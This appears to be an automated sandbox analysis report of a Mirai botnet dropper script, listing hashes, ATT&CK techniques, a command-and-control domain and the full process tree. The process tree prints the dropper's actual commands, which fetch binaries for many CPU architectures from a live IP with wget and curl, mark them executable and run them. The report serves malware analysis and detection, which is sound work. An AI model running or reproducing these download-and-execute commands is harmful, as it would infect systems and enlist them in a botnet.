mirai | 0c9fc61ecbc6d21e9780d71dd156614b54c01e0fa6e120f8f46b810bba18450a

Analysis

max time kernel
144s
max time network
148s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240508-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240508-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
09/03/2025, 02:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0c9fc61ecbc6d21e9780d71dd156614b54c01e0fa6e120f8f46b810bba18450a.sh
Size

2KB
MD5

8a2a6c948d201883b09f9c5bbedaca00
SHA1

c26e8adbd7df878c6484ad6d080b596c6c4f915e
SHA256

0c9fc61ecbc6d21e9780d71dd156614b54c01e0fa6e120f8f46b810bba18450a
SHA512

fe2a381e44459defa01524d05f45532d2dbc75b2bc9db4ea42c7624f7811b05eba2dda5e200e04c5dd46ecacf37ffabe268907feeb4256fd8d4a57e0216bdceb

Score

10^/10

mirai botnet defense_evasion discovery

Malware Config

Extracted

Family

mirai

botnet1.uapworx1.sbs

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai

File and Directory Permissions Modification 1 TTPs 15 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
1490	chmod
1497	chmod
1552	chmod
1564	chmod
1532	chmod
1544	chmod
1569	chmod
1503	chmod
1508	chmod
1513	chmod
1518	chmod
1558	chmod
1526	chmod
1538	chmod
1575	chmod

Deletes itself 3 IoCs

pid	Process
1491	0c9fc61ecbc6d21e9780d71dd156614b54c01e0fa6e120f8f46b810bba18450a.sh
1519	KBD
1520	KBD

Executes dropped EXE 15 IoCs

ioc	pid	Process
/tmp/KBD	1491	0c9fc61ecbc6d21e9780d71dd156614b54c01e0fa6e120f8f46b810bba18450a.sh
/tmp/KBD	1498	0c9fc61ecbc6d21e9780d71dd156614b54c01e0fa6e120f8f46b810bba18450a.sh
/tmp/KBD	1504	0c9fc61ecbc6d21e9780d71dd156614b54c01e0fa6e120f8f46b810bba18450a.sh
/tmp/KBD	1509	0c9fc61ecbc6d21e9780d71dd156614b54c01e0fa6e120f8f46b810bba18450a.sh
/tmp/KBD	1514	0c9fc61ecbc6d21e9780d71dd156614b54c01e0fa6e120f8f46b810bba18450a.sh
/tmp/KBD	1519	0c9fc61ecbc6d21e9780d71dd156614b54c01e0fa6e120f8f46b810bba18450a.sh
/tmp/KBD	1527	0c9fc61ecbc6d21e9780d71dd156614b54c01e0fa6e120f8f46b810bba18450a.sh
/tmp/KBD	1533	0c9fc61ecbc6d21e9780d71dd156614b54c01e0fa6e120f8f46b810bba18450a.sh
/tmp/KBD	1539	0c9fc61ecbc6d21e9780d71dd156614b54c01e0fa6e120f8f46b810bba18450a.sh
/tmp/KBD	1545	0c9fc61ecbc6d21e9780d71dd156614b54c01e0fa6e120f8f46b810bba18450a.sh
/tmp/KBD	1553	0c9fc61ecbc6d21e9780d71dd156614b54c01e0fa6e120f8f46b810bba18450a.sh
/tmp/KBD	1559	0c9fc61ecbc6d21e9780d71dd156614b54c01e0fa6e120f8f46b810bba18450a.sh
/tmp/KBD	1565	0c9fc61ecbc6d21e9780d71dd156614b54c01e0fa6e120f8f46b810bba18450a.sh
/tmp/KBD	1570	0c9fc61ecbc6d21e9780d71dd156614b54c01e0fa6e120f8f46b810bba18450a.sh
/tmp/KBD	1576	0c9fc61ecbc6d21e9780d71dd156614b54c01e0fa6e120f8f46b810bba18450a.sh

Traces itself 4 IoCs

Traces itself to prevent debugging attempts

pid	Process
1491	0c9fc61ecbc6d21e9780d71dd156614b54c01e0fa6e120f8f46b810bba18450a.sh
1492	0c9fc61ecbc6d21e9780d71dd156614b54c01e0fa6e120f8f46b810bba18450a.sh
1519	KBD
1520	KBD

Changes its process name 2 IoCs

description	ioc	pid	Process
Changes the process name, possibly in an attempt to hide itself	httpd	1491	0c9fc61ecbc6d21e9780d71dd156614b54c01e0fa6e120f8f46b810bba18450a.sh
Changes the process name, possibly in an attempt to hide itself	httpd	1519	KBD

System Network Configuration Discovery 1 TTPs 3 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
1493	wget
1495	curl
1496	cat

Writes file to tmp directory 28 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/main_mips	wget
File opened for modification	/tmp/main_mips	curl
File opened for modification	/tmp/main_mpsl	wget
File opened for modification	/tmp/main_arm	wget
File opened for modification	/tmp/main_spc	curl
File opened for modification	/tmp/main_sh4	wget
File opened for modification	/tmp/KBD	0c9fc61ecbc6d21e9780d71dd156614b54c01e0fa6e120f8f46b810bba18450a.sh
File opened for modification	/tmp/main_i468	curl
File opened for modification	/tmp/main_x86_64	wget
File opened for modification	/tmp/KBD	KBD
File opened for modification	/tmp/main_arm	curl
File opened for modification	/tmp/main_arm5	curl
File opened for modification	/tmp/main_arm7	curl
File opened for modification	/tmp/main_ppc	wget
File opened for modification	/tmp/main_x86	wget
File opened for modification	/tmp/main_arm5	wget
File opened for modification	/tmp/main_ppc	curl
File opened for modification	/tmp/main_m68k	wget
File opened for modification	/tmp/main_m68k	curl
File opened for modification	/tmp/main_sh4	curl
File opened for modification	/tmp/main_x86	curl
File opened for modification	/tmp/main_arc	curl
File opened for modification	/tmp/main_i686	curl
File opened for modification	/tmp/main_x86_64	curl
File opened for modification	/tmp/main_mpsl	curl
File opened for modification	/tmp/main_arm6	wget
File opened for modification	/tmp/main_arm6	curl
File opened for modification	/tmp/main_arm7	wget

/tmp/0c9fc61ecbc6d21e9780d71dd156614b54c01e0fa6e120f8f46b810bba18450a.sh
/tmp/0c9fc61ecbc6d21e9780d71dd156614b54c01e0fa6e120f8f46b810bba18450a.sh
1⤵
- Deletes itself
- Executes dropped EXE
- Traces itself
- Changes its process name
- Writes file to tmp directory
PID:1481
- /usr/bin/wget
  wget http://154.12.94.10/main_x86
  2⤵
  - Writes file to tmp directory
  PID:1482
- /usr/bin/curl
  curl -O http://154.12.94.10/main_x86
  2⤵
  - Writes file to tmp directory
  PID:1488
- /bin/cat
  cat main_x86
  2⤵
  PID:1489
- /bin/chmod
  chmod +x 0c9fc61ecbc6d21e9780d71dd156614b54c01e0fa6e120f8f46b810bba18450a.sh config-err-vjIuEe KBD main_x86 netplan_6j5vv7s9 snap-private-tmp ssh-dtowVm2DO5to systemd-private-4e3527339a82488191359476ca1c9750-bolt.service-gJSU3s systemd-private-4e3527339a82488191359476ca1c9750-colord.service-wCRmQN systemd-private-4e3527339a82488191359476ca1c9750-ModemManager.service-kUHQ4i systemd-private-4e3527339a82488191359476ca1c9750-systemd-resolved.service-6Kmxdm systemd-private-4e3527339a82488191359476ca1c9750-systemd-timedated.service-ozdVIZ
  2⤵
  - File and Directory Permissions Modification
  PID:1490
- /usr/bin/wget
  wget http://154.12.94.10/main_mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1493
- /usr/bin/curl
  curl -O http://154.12.94.10/main_mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1495
- /bin/cat
  cat main_mips
  2⤵
  - System Network Configuration Discovery
  PID:1496
- /bin/chmod
  chmod +x 0c9fc61ecbc6d21e9780d71dd156614b54c01e0fa6e120f8f46b810bba18450a.sh config-err-vjIuEe KBD "KBD (deleted)" main_mips main_x86 netplan_6j5vv7s9 snap-private-tmp ssh-dtowVm2DO5to systemd-private-4e3527339a82488191359476ca1c9750-bolt.service-gJSU3s systemd-private-4e3527339a82488191359476ca1c9750-colord.service-wCRmQN systemd-private-4e3527339a82488191359476ca1c9750-ModemManager.service-kUHQ4i systemd-private-4e3527339a82488191359476ca1c9750-systemd-resolved.service-6Kmxdm systemd-private-4e3527339a82488191359476ca1c9750-systemd-timedated.service-ozdVIZ
  2⤵
  - File and Directory Permissions Modification
  PID:1497
- /tmp/KBD
  ./KBD
  2⤵
  PID:1498
- /usr/bin/wget
  wget http://154.12.94.10/main_arc
  2⤵
  PID:1500
- /usr/bin/curl
  curl -O http://154.12.94.10/main_arc
  2⤵
  - Writes file to tmp directory
  PID:1501
- /bin/cat
  cat main_arc
  2⤵
  PID:1502
- /bin/chmod
  chmod +x 0c9fc61ecbc6d21e9780d71dd156614b54c01e0fa6e120f8f46b810bba18450a.sh config-err-vjIuEe KBD "KBD (deleted)" main_arc main_mips main_x86 netplan_6j5vv7s9 snap-private-tmp ssh-dtowVm2DO5to systemd-private-4e3527339a82488191359476ca1c9750-bolt.service-gJSU3s systemd-private-4e3527339a82488191359476ca1c9750-colord.service-wCRmQN systemd-private-4e3527339a82488191359476ca1c9750-ModemManager.service-kUHQ4i systemd-private-4e3527339a82488191359476ca1c9750-systemd-resolved.service-6Kmxdm systemd-private-4e3527339a82488191359476ca1c9750-systemd-timedated.service-ozdVIZ
  2⤵
  - File and Directory Permissions Modification
  PID:1503
- /tmp/KBD
  ./KBD
  2⤵
  PID:1504
- /usr/bin/wget
  wget http://154.12.94.10/main_i468
  2⤵
  PID:1505
- /usr/bin/curl
  curl -O http://154.12.94.10/main_i468
  2⤵
  - Writes file to tmp directory
  PID:1506
- /bin/cat
  cat main_i468
  2⤵
  PID:1507
- /bin/chmod
  chmod +x 0c9fc61ecbc6d21e9780d71dd156614b54c01e0fa6e120f8f46b810bba18450a.sh config-err-vjIuEe KBD "KBD (deleted)" main_arc main_i468 main_mips main_x86 netplan_6j5vv7s9 snap-private-tmp ssh-dtowVm2DO5to systemd-private-4e3527339a82488191359476ca1c9750-bolt.service-gJSU3s systemd-private-4e3527339a82488191359476ca1c9750-colord.service-wCRmQN systemd-private-4e3527339a82488191359476ca1c9750-ModemManager.service-kUHQ4i systemd-private-4e3527339a82488191359476ca1c9750-systemd-resolved.service-6Kmxdm systemd-private-4e3527339a82488191359476ca1c9750-systemd-timedated.service-ozdVIZ
  2⤵
  - File and Directory Permissions Modification
  PID:1508
- /tmp/KBD
  ./KBD
  2⤵
  PID:1509
- /usr/bin/wget
  wget http://154.12.94.10/main_i686
  2⤵
  PID:1510
- /usr/bin/curl
  curl -O http://154.12.94.10/main_i686
  2⤵
  - Writes file to tmp directory
  PID:1511
- /bin/cat
  cat main_i686
  2⤵
  PID:1512
- /bin/chmod
  chmod +x 0c9fc61ecbc6d21e9780d71dd156614b54c01e0fa6e120f8f46b810bba18450a.sh config-err-vjIuEe KBD "KBD (deleted)" main_arc main_i468 main_i686 main_mips main_x86 netplan_6j5vv7s9 snap-private-tmp ssh-dtowVm2DO5to systemd-private-4e3527339a82488191359476ca1c9750-bolt.service-gJSU3s systemd-private-4e3527339a82488191359476ca1c9750-colord.service-wCRmQN systemd-private-4e3527339a82488191359476ca1c9750-ModemManager.service-kUHQ4i systemd-private-4e3527339a82488191359476ca1c9750-systemd-resolved.service-6Kmxdm systemd-private-4e3527339a82488191359476ca1c9750-systemd-timedated.service-ozdVIZ
  2⤵
  - File and Directory Permissions Modification
  PID:1513
- /tmp/KBD
  ./KBD
  2⤵
  PID:1514
- /usr/bin/wget
  wget http://154.12.94.10/main_x86_64
  2⤵
  - Writes file to tmp directory
  PID:1515
- /usr/bin/curl
  curl -O http://154.12.94.10/main_x86_64
  2⤵
  - Writes file to tmp directory
  PID:1516
- /bin/cat
  cat main_x86_64
  2⤵
  PID:1517
- /bin/chmod
  chmod +x 0c9fc61ecbc6d21e9780d71dd156614b54c01e0fa6e120f8f46b810bba18450a.sh config-err-vjIuEe KBD "KBD (deleted)" main_arc main_i468 main_i686 main_mips main_x86 main_x86_64 netplan_6j5vv7s9 snap-private-tmp ssh-dtowVm2DO5to systemd-private-4e3527339a82488191359476ca1c9750-bolt.service-gJSU3s systemd-private-4e3527339a82488191359476ca1c9750-colord.service-wCRmQN systemd-private-4e3527339a82488191359476ca1c9750-ModemManager.service-kUHQ4i systemd-private-4e3527339a82488191359476ca1c9750-systemd-resolved.service-6Kmxdm systemd-private-4e3527339a82488191359476ca1c9750-systemd-timedated.service-ozdVIZ
  2⤵
  - File and Directory Permissions Modification
  PID:1518
- /tmp/KBD
  ./KBD
  2⤵
  - Deletes itself
  - Traces itself
  - Changes its process name
  - Writes file to tmp directory
  PID:1519
- /usr/bin/wget
  wget http://154.12.94.10/main_mpsl
  2⤵
  - Writes file to tmp directory
  PID:1521
- /usr/bin/curl
  curl -O http://154.12.94.10/main_mpsl
  2⤵
  - Writes file to tmp directory
  PID:1524
- /bin/cat
  cat main_mpsl
  2⤵
  PID:1525
- /bin/chmod
  chmod +x 0c9fc61ecbc6d21e9780d71dd156614b54c01e0fa6e120f8f46b810bba18450a.sh config-err-vjIuEe KBD "KBD (deleted)" main_arc main_i468 main_i686 main_mips main_mpsl main_x86 main_x86_64 netplan_6j5vv7s9 snap-private-tmp ssh-dtowVm2DO5to systemd-private-4e3527339a82488191359476ca1c9750-bolt.service-gJSU3s systemd-private-4e3527339a82488191359476ca1c9750-colord.service-wCRmQN systemd-private-4e3527339a82488191359476ca1c9750-ModemManager.service-kUHQ4i systemd-private-4e3527339a82488191359476ca1c9750-systemd-resolved.service-6Kmxdm systemd-private-4e3527339a82488191359476ca1c9750-systemd-timedated.service-ozdVIZ
  2⤵
  - File and Directory Permissions Modification
  PID:1526
- /tmp/KBD
  ./KBD
  2⤵
  PID:1527
- /usr/bin/wget
  wget http://154.12.94.10/main_arm
  2⤵
  - Writes file to tmp directory
  PID:1529
- /usr/bin/curl
  curl -O http://154.12.94.10/main_arm
  2⤵
  - Writes file to tmp directory
  PID:1530
- /bin/cat
  cat main_arm
  2⤵
  PID:1531
- /bin/chmod
  chmod +x 0c9fc61ecbc6d21e9780d71dd156614b54c01e0fa6e120f8f46b810bba18450a.sh config-err-vjIuEe KBD "KBD (deleted)" main_arc main_arm main_i468 main_i686 main_mips main_mpsl main_x86 main_x86_64 netplan_6j5vv7s9 snap-private-tmp ssh-dtowVm2DO5to systemd-private-4e3527339a82488191359476ca1c9750-bolt.service-gJSU3s systemd-private-4e3527339a82488191359476ca1c9750-colord.service-wCRmQN systemd-private-4e3527339a82488191359476ca1c9750-ModemManager.service-kUHQ4i systemd-private-4e3527339a82488191359476ca1c9750-systemd-resolved.service-6Kmxdm systemd-private-4e3527339a82488191359476ca1c9750-systemd-timedated.service-ozdVIZ
  2⤵
  - File and Directory Permissions Modification
  PID:1532
- /tmp/KBD
  ./KBD
  2⤵
  PID:1533
- /usr/bin/wget
  wget http://154.12.94.10/main_arm5
  2⤵
  - Writes file to tmp directory
  PID:1535
- /usr/bin/curl
  curl -O http://154.12.94.10/main_arm5
  2⤵
  - Writes file to tmp directory
  PID:1536
- /bin/cat
  cat main_arm5
  2⤵
  PID:1537
- /bin/chmod
  chmod +x 0c9fc61ecbc6d21e9780d71dd156614b54c01e0fa6e120f8f46b810bba18450a.sh config-err-vjIuEe KBD "KBD (deleted)" main_arc main_arm main_arm5 main_i468 main_i686 main_mips main_mpsl main_x86 main_x86_64 netplan_6j5vv7s9 snap-private-tmp ssh-dtowVm2DO5to systemd-private-4e3527339a82488191359476ca1c9750-bolt.service-gJSU3s systemd-private-4e3527339a82488191359476ca1c9750-colord.service-wCRmQN systemd-private-4e3527339a82488191359476ca1c9750-ModemManager.service-kUHQ4i systemd-private-4e3527339a82488191359476ca1c9750-systemd-resolved.service-6Kmxdm systemd-private-4e3527339a82488191359476ca1c9750-systemd-timedated.service-ozdVIZ
  2⤵
  - File and Directory Permissions Modification
  PID:1538
- /tmp/KBD
  ./KBD
  2⤵
  PID:1539
- /usr/bin/wget
  wget http://154.12.94.10/main_arm6
  2⤵
  - Writes file to tmp directory
  PID:1541
- /usr/bin/curl
  curl -O http://154.12.94.10/main_arm6
  2⤵
  - Writes file to tmp directory
  PID:1542
- /bin/cat
  cat main_arm6
  2⤵
  PID:1543
- /bin/chmod
  chmod +x 0c9fc61ecbc6d21e9780d71dd156614b54c01e0fa6e120f8f46b810bba18450a.sh config-err-vjIuEe KBD "KBD (deleted)" main_arc main_arm main_arm5 main_arm6 main_i468 main_i686 main_mips main_mpsl main_x86 main_x86_64 netplan_6j5vv7s9 snap-private-tmp ssh-dtowVm2DO5to systemd-private-4e3527339a82488191359476ca1c9750-bolt.service-gJSU3s systemd-private-4e3527339a82488191359476ca1c9750-colord.service-wCRmQN systemd-private-4e3527339a82488191359476ca1c9750-ModemManager.service-kUHQ4i systemd-private-4e3527339a82488191359476ca1c9750-systemd-resolved.service-6Kmxdm systemd-private-4e3527339a82488191359476ca1c9750-systemd-timedated.service-ozdVIZ
  2⤵
  - File and Directory Permissions Modification
  PID:1544
- /tmp/KBD
  ./KBD
  2⤵
  PID:1545
- /usr/bin/wget
  wget http://154.12.94.10/main_arm7
  2⤵
  - Writes file to tmp directory
  PID:1547
- /usr/bin/curl
  curl -O http://154.12.94.10/main_arm7
  2⤵
  - Writes file to tmp directory
  PID:1548
- /bin/cat
  cat main_arm7
  2⤵
  PID:1551
- /bin/chmod
  chmod +x 0c9fc61ecbc6d21e9780d71dd156614b54c01e0fa6e120f8f46b810bba18450a.sh config-err-vjIuEe KBD "KBD (deleted)" main_arc main_arm main_arm5 main_arm6 main_arm7 main_i468 main_i686 main_mips main_mpsl main_x86 main_x86_64 netplan_6j5vv7s9 snap-private-tmp ssh-dtowVm2DO5to systemd-private-4e3527339a82488191359476ca1c9750-bolt.service-gJSU3s systemd-private-4e3527339a82488191359476ca1c9750-colord.service-wCRmQN systemd-private-4e3527339a82488191359476ca1c9750-ModemManager.service-kUHQ4i systemd-private-4e3527339a82488191359476ca1c9750-systemd-resolved.service-6Kmxdm
  2⤵
  - File and Directory Permissions Modification
  PID:1552
- /tmp/KBD
  ./KBD
  2⤵
  PID:1553
- /usr/bin/wget
  wget http://154.12.94.10/main_ppc
  2⤵
  - Writes file to tmp directory
  PID:1555
- /usr/bin/curl
  curl -O http://154.12.94.10/main_ppc
  2⤵
  - Writes file to tmp directory
  PID:1556
- /bin/cat
  cat main_ppc
  2⤵
  PID:1557
- /bin/chmod
  chmod +x 0c9fc61ecbc6d21e9780d71dd156614b54c01e0fa6e120f8f46b810bba18450a.sh config-err-vjIuEe KBD "KBD (deleted)" main_arc main_arm main_arm5 main_arm6 main_arm7 main_i468 main_i686 main_mips main_mpsl main_ppc main_x86 main_x86_64 netplan_6j5vv7s9 snap-private-tmp ssh-dtowVm2DO5to systemd-private-4e3527339a82488191359476ca1c9750-bolt.service-gJSU3s systemd-private-4e3527339a82488191359476ca1c9750-colord.service-wCRmQN systemd-private-4e3527339a82488191359476ca1c9750-ModemManager.service-kUHQ4i systemd-private-4e3527339a82488191359476ca1c9750-systemd-resolved.service-6Kmxdm
  2⤵
  - File and Directory Permissions Modification
  PID:1558
- /tmp/KBD
  ./KBD
  2⤵
  PID:1559
- /usr/bin/wget
  wget http://154.12.94.10/main_spc
  2⤵
  PID:1561
- /usr/bin/curl
  curl -O http://154.12.94.10/main_spc
  2⤵
  - Writes file to tmp directory
  PID:1562
- /bin/cat
  cat main_spc
  2⤵
  PID:1563
- /bin/chmod
  chmod +x 0c9fc61ecbc6d21e9780d71dd156614b54c01e0fa6e120f8f46b810bba18450a.sh config-err-vjIuEe KBD "KBD (deleted)" main_arc main_arm main_arm5 main_arm6 main_arm7 main_i468 main_i686 main_mips main_mpsl main_ppc main_spc main_x86 main_x86_64 netplan_6j5vv7s9 snap-private-tmp ssh-dtowVm2DO5to systemd-private-4e3527339a82488191359476ca1c9750-bolt.service-gJSU3s systemd-private-4e3527339a82488191359476ca1c9750-colord.service-wCRmQN systemd-private-4e3527339a82488191359476ca1c9750-ModemManager.service-kUHQ4i systemd-private-4e3527339a82488191359476ca1c9750-systemd-resolved.service-6Kmxdm
  2⤵
  - File and Directory Permissions Modification
  PID:1564
- /tmp/KBD
  ./KBD
  2⤵
  PID:1565
- /usr/bin/wget
  wget http://154.12.94.10/main_m68k
  2⤵
  - Writes file to tmp directory
  PID:1566
- /usr/bin/curl
  curl -O http://154.12.94.10/main_m68k
  2⤵
  - Writes file to tmp directory
  PID:1567
- /bin/cat
  cat main_m68k
  2⤵
  PID:1568
- /bin/chmod
  chmod +x 0c9fc61ecbc6d21e9780d71dd156614b54c01e0fa6e120f8f46b810bba18450a.sh config-err-vjIuEe KBD "KBD (deleted)" main_arc main_arm main_arm5 main_arm6 main_arm7 main_i468 main_i686 main_m68k main_mips main_mpsl main_ppc main_spc main_x86 main_x86_64 netplan_6j5vv7s9 snap-private-tmp ssh-dtowVm2DO5to systemd-private-4e3527339a82488191359476ca1c9750-bolt.service-gJSU3s systemd-private-4e3527339a82488191359476ca1c9750-colord.service-wCRmQN systemd-private-4e3527339a82488191359476ca1c9750-ModemManager.service-kUHQ4i systemd-private-4e3527339a82488191359476ca1c9750-systemd-resolved.service-6Kmxdm
  2⤵
  - File and Directory Permissions Modification
  PID:1569
- /tmp/KBD
  ./KBD
  2⤵
  PID:1570
- /usr/bin/wget
  wget http://154.12.94.10/main_sh4
  2⤵
  - Writes file to tmp directory
  PID:1572
- /usr/bin/curl
  curl -O http://154.12.94.10/main_sh4
  2⤵
  - Writes file to tmp directory
  PID:1573
- /bin/cat
  cat main_sh4
  2⤵
  PID:1574
- /bin/chmod
  chmod +x 0c9fc61ecbc6d21e9780d71dd156614b54c01e0fa6e120f8f46b810bba18450a.sh config-err-vjIuEe KBD "KBD (deleted)" main_arc main_arm main_arm5 main_arm6 main_arm7 main_i468 main_i686 main_m68k main_mips main_mpsl main_ppc main_sh4 main_spc main_x86 main_x86_64 netplan_6j5vv7s9 snap-private-tmp ssh-dtowVm2DO5to systemd-private-4e3527339a82488191359476ca1c9750-bolt.service-gJSU3s systemd-private-4e3527339a82488191359476ca1c9750-colord.service-wCRmQN systemd-private-4e3527339a82488191359476ca1c9750-ModemManager.service-kUHQ4i systemd-private-4e3527339a82488191359476ca1c9750-systemd-resolved.service-6Kmxdm
  2⤵
  - File and Directory Permissions Modification
  PID:1575
- /tmp/KBD
  ./KBD
  2⤵
  PID:1576

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/KBD

Filesize
177KB

MD5
892ce58dcbb9f909caeae3fd4cc4e73f

SHA1
60ff30437d969ea65836b6f8567117d36d97be82

SHA256
9e8e948b0152ab22d0b3ab6cdcc9e1046e0e6bb06ade2a817abf93115f53135a

SHA512
12a8b6305c4725b75a6cd50e157ab003ff35e30010859ae80e95eddcdb54b888c15fc84aef3f996bbdc6a5e5e9b1153dbc121fe8f047399737a8f0bee87749a6

Download Submit
/tmp/main_arc

Filesize
206B

MD5
f4b4c2874317b2fac53386f4614ae7c5

SHA1
883a1d147e555bd8269ce42a042d91952eef734a

SHA256
afbd8b1b91e50ab748075c20135197146c30abb89c18491db4968115d81dde31

SHA512
51011abb35e5092697cd3f1b19607633dc17cfd16fbc958979c9276db7d709217b3cc4e9c0aea2aa81aaa32593f482853011cc8a727253d7f3fad20678abd2c7

Download Submit
/tmp/main_arm

Filesize
130KB

MD5
430d5ce27098f7a1b678e00b8babed16

SHA1
9379f845fbacb3e0e0e109acdf7ee0bd8ed586b8

SHA256
57c62930fd2745c9bd63722cbd438278d5c1e4f3612ffae871c80a798bf734c8

SHA512
2eee190f74109f7622939bc3749840c3be157cded3ff4461889b86aa48880f0b43531b22127431a7219b7747555b6c8277f7c603fe10da916db3a3b71c3dff1b

Download Submit
/tmp/main_arm5

Filesize
126KB

MD5
0c178203ddde161cd0a9578d1dc8696a

SHA1
987f1fbbe2a7aba7408292d2b3f0b22aa7fcd6cf

SHA256
ff0811a41e0c7594c355f33c54c1cde1e544eb7ec81b8033fa5da9a628aeb448

SHA512
a4169f3df941368d366185c475a6057ffa5cfaf6db028566acb28d959db6d0bf3e9a5ad5a19f1c5b9e81d8f69ef6a446a3e53cda25925c9608fa023959068d60

Download Submit
/tmp/main_arm6

Filesize
140KB

MD5
3d2b4205a3b9b49c71d09686431d5d4e

SHA1
497ae0205773e244b2ed8b5f2e513eeb9704d729

SHA256
6a3212199bcd4844abe8523d90007077c74311983d1bd1b523cf0d66a2a02593

SHA512
983f86fca5e73998a3014d9dbacc3d23a3bcaa5709a4e7dde23762a0952808da3a85e7e0c06f49809ab5ac3b4165d6e483dc79a1d6d62f297037579f67ac62af

Download Submit
/tmp/main_arm7

Filesize
177KB

MD5
161b6afe1a25feb4f81f87e5b942107d

SHA1
7e964bf38390cdfad031d88cdb2c31092274f4ff

SHA256
592ba920d31c5214330403eb03344a270096e3a650771b240ec757859da40ecc

SHA512
37ce46496c019dc1290c705d478fa3c12b9cbcf4b43feae943cfda5d50c64b5a573aa936f489f1401a8d0140aab31dc91e8a8f1340e3c23f9b79c39013c3f49b

Download Submit
/tmp/main_i468

Filesize
207B

MD5
a120322580bf60223b9c955e4b956122

SHA1
f2ba82cc622e9d7637df725f8f9127220d25e5fc

SHA256
9441b8ae6765cc1c6944af1c64f6eb056013420d37c31b8fdd71af4f6165cd60

SHA512
d76f0e2481a44a2969b4a3dd7c846797b3e75541c60f2177adfe1595b98ae8c1fec8ef6b217fb3cd1cac8cfc99ea8553a480b79c8eebc4970b423a7e268e6232

Download Submit
/tmp/main_i686

Filesize
207B

MD5
2e98e31a21dcd9e4f22300ec2dba7deb

SHA1
cae912a4f6a9f3eafbdba5ea91857a4acc1eb1a7

SHA256
d7003af9a551b1e5622a749bbe8fc6927f81712b0b18c22d9fd15a414e0d0bdc

SHA512
98e41186ec9138f1ed38aa6aacd6a147df6537176cbfd228437cf02d65a131520d42a4455376825d3a5c789203422b6d0f4ac158e7fa189a6709e25e103ce503

Download Submit
/tmp/main_m68k

Filesize
146KB

MD5
a46f5559852ec251c588c87de5f39e7d

SHA1
b05eb4932eebc667d279b47e0d5feadfb7ceb1fe

SHA256
0df5fc4a3500394d31a12be7ce85a7ca8993dc10845b83695c8292eeabbfbaa3

SHA512
a568f157633c116f8c7232b32c0f7ce6f3621fc469f57b53e05cde3d9a7d676c5605528b40ca845af7a9a49229ccc48d9cd96732f72d537544f7fe5e1f342275

Download Submit
/tmp/main_mips

Filesize
169KB

MD5
41aa6b950403c0b60a25a7fb5d55510d

SHA1
6858d974dca88148f319dc9c3c3d55bb024ceb02

SHA256
2cdd44752af0c13270d77ed701b5f7e28b8b9bc7a391b815e7d34bdec556624a

SHA512
a3e06c2e0b43359c8018a5ec6012c8a6dfc3b7056e503f89f7a6cb127a58689b5c90dadd199d8dd71a5b787f30fe015b4083918881496af1e099b45d0a2b7cf2

Download Submit
/tmp/main_mpsl

Filesize
173KB

MD5
308702394c207b5cfb5c5358a5ae4d5c

SHA1
039257b6cc0d621f79f80dc5d0fe57223618c594

SHA256
7bb22d623a88fe966041c3ce885300ff6670bc1522a488c99f7d37979da70af2

SHA512
27a5d63bc12c4702fedbe8ee75289a0595df481d7ffce1a4720a4244cb850fdad0baa891099fcd2ec8d50cd6356fe12976d1debc05b310a41f5ca3e13609150d

Download Submit
/tmp/main_ppc

Filesize
130KB

MD5
4acbb4ee28b18300e3b0c9a3d4cd9f69

SHA1
1d8d8cba1dcfac48ee6e0a5a5105e97fa7863595

SHA256
47961a8bfde3ff7c4baa1b3f4424aa76b4d58eda0f2603924ba45a321a6c5bb9

SHA512
76de856d1dd7af8f92b1fd6ed7b04c098945022fa98d339711743cc218bc4160fc7843fee2293c6b9b38d08eca33912db27799d7c4520310523e315d2972acfb

Download Submit
/tmp/main_sh4

Filesize
114KB

MD5
7765ad7cb390bb071825bcb1228eee26

SHA1
87ea06ae8856a9a6a8ba67b3ae77eb995a0d38d7

SHA256
92c7bf6b5428398ba329fa23e73c10f3e68cca53879290285bebda768a5fc4d5

SHA512
11003b3870af3c2308629ee00e35693601f4cc0cf4196c1365091d877e55871a1275bb79149f36a02d5761da762b656bab2789a9ea004e7f6d3fdc48d4c0a3f5

Download Submit
/tmp/main_spc

Filesize
206B

MD5
da04d96fb7adda24612544884bb5ff90

SHA1
a5959e1a3dc5190b8a907b75eec54e7f60cbebf6

SHA256
e1d43933140b600207b21a59b5d260ed39ec3db497ab3c329a8d724ceecff16a

SHA512
21652310b28d12a0d95b7fcdf30f08953a43853f3f7a35da4102134392563e729a6633677aa3eda0292941a17c63f92c77bc62803dc4b10b8d36323c8ed4f20b

Download Submit
/tmp/main_x86

Filesize
87KB

MD5
8b6a1744eda479cbde85fc53f5c4d5fc

SHA1
7fc40a2b65794ca653fe92dc4abff37ef1406556

SHA256
2f47aa55b0271df7e9f40c431a6f090af3cb47df7a96191fe9e355b5c4fb23eb

SHA512
2841113eb447e18949648aef2a1f3d7710d55af250fd72b5cbf0cc5519783926a2faae93190db34f9de62e76273110e3ab85056b24e9db56aed83898044d3390

Download Submit
/tmp/main_x86_64

Filesize
136KB

MD5
49297a8a71dc10d1be9260f076f6be8e

SHA1
bd77da998f2f9a3deae67e44b826ecbfa0e6e8fd

SHA256
8dd0239b7673b610f9e8469f6134d9ecf285826921afbdf86924dab6b68773c6

SHA512
96e9e7b977275be40963d955e9407b273574c3ec2737d79a0623023e3659dd678d27f9782eff54759162ee148275e43b23da5018353bbddad65f3408669c220d

Download Submit